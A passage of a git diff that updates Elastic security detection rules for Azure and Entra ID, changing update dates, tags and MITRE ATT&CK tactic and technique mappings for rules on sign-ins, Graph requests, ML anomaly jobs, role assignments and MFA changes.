Guide", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -193,40 +183,31 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml index 53b7a160471..c41eda20e66 100644 --- a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml +++ b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ references = [ risk_score = 21 rule_id = "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Graph", - "Data Source: Microsoft Graph Activity Logs", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] timestamp_override = "event.ingested" type = "new_terms" @@ -114,34 +106,39 @@ event.dataset: "azure.graphactivitylogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/ml_azure_event_failures.toml b/rules/integrations/azure/ml_azure_event_failures.toml index 273f46e76a5..e5dcf556327 100644 --- a/rules/integrations/azure/ml_azure_event_failures.toml +++ b/rules/integrations/azure/ml_azure_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -79,14 +79,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "1eb74889-18c5-4f78-8010-d8aceb7a9ef4" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] @@ -97,28 +90,18 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - [[rule.threat]] framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index 9e1182f57d9..a2eb55186b4 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -88,61 +88,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/azure/ml_azure_rare_method_by_city.toml b/rules/integrations/azure/ml_azure_rare_method_by_city.toml index 84f94ffc52b..f9a6f0637fe 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_city.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -80,24 +80,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ce08cdb8-e6cb-46bb-a7cc-16d17547323f" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -107,3 +95,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_country.toml b/rules/integrations/azure/ml_azure_rare_method_by_country.toml index bbaf6442692..82337ac08ee 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_country.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -79,24 +79,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "76de17b9-af25-49a0-9378-02888b6bb3a2" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -106,3 +94,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_user.toml b/rules/integrations/azure/ml_azure_rare_method_by_user.toml index 2dd9dacbf77..2a492ccadcb 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_user.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -78,24 +78,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "81892f44-4946-4b27-95d3-1d8929b114a7" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Azure Activity Logs", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -106,42 +94,25 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index 222286c88de..829a5c592d2 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "df26fd74-1baa-4479-b42e-48da84642330" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,26 +73,13 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/persistence_automation_webhook_created.toml b/rules/integrations/azure/persistence_automation_webhook_created.toml index 8329792a513..e92f77af499 100644 --- a/rules/integrations/azure/persistence_automation_webhook_created.toml +++ b/rules/integrations/azure/persistence_automation_webhook_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,6 +79,7 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -88,15 +89,3 @@ reference = "https://attack.mitre.org/techniques/T1546/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml index a89c1fcdf5d..91602b230ea 100644 --- a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,16 +70,7 @@ references = [ risk_score = 47 rule_id = "bc48bba7-4a23-4232-b551-eca3ca1e3f20" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -92,6 +83,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" @@ -102,12 +94,28 @@ id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml index 94d21dfa04f..2c0d8ed1c85 100644 --- a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml +++ b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,16 +60,7 @@ references = [ risk_score = 73 rule_id = "04c5a96f-19c5-44fd-9571-a0b033f9086f" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,19 +74,36 @@ event.dataset:azure.auditlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml index 5729fb8abc7..38ea5fab7ad 100644 --- a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml +++ b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,16 +62,7 @@ This rule identifies the deactivation of MFA for an Entra ID user account. This risk_score = 47 rule_id = "dafa3235-76dc-40e2-9f71-1773b96d24cf" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,19 +77,36 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml index 67622baed76..4cd9743fae9 100644 --- a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml +++ b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,7 +69,7 @@ references = [ risk_score = 73 rule_id = "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8" severity = "high" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,18 +84,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml index 421b38cec2b..68e733f883d 100644 --- a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,13 +68,7 @@ references = [ risk_score = 47 rule_id = "7882cebf-6cf1-4de3-9662-213aa13e8b80" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -85,30 +79,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml index b1eac4dbf32..72b956b54e5 100644 --- a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml +++ b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,17 +52,7 @@ references = [ risk_score = 47 rule_id = "40e60816-5122-11f0-9caa-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Use Case: Threat Detection", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-In Logs", - "Tactic: Persistence", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -110,48 +100,28 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml index 39ea903de00..99fc3c11e04 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -60,15 +60,7 @@ references = 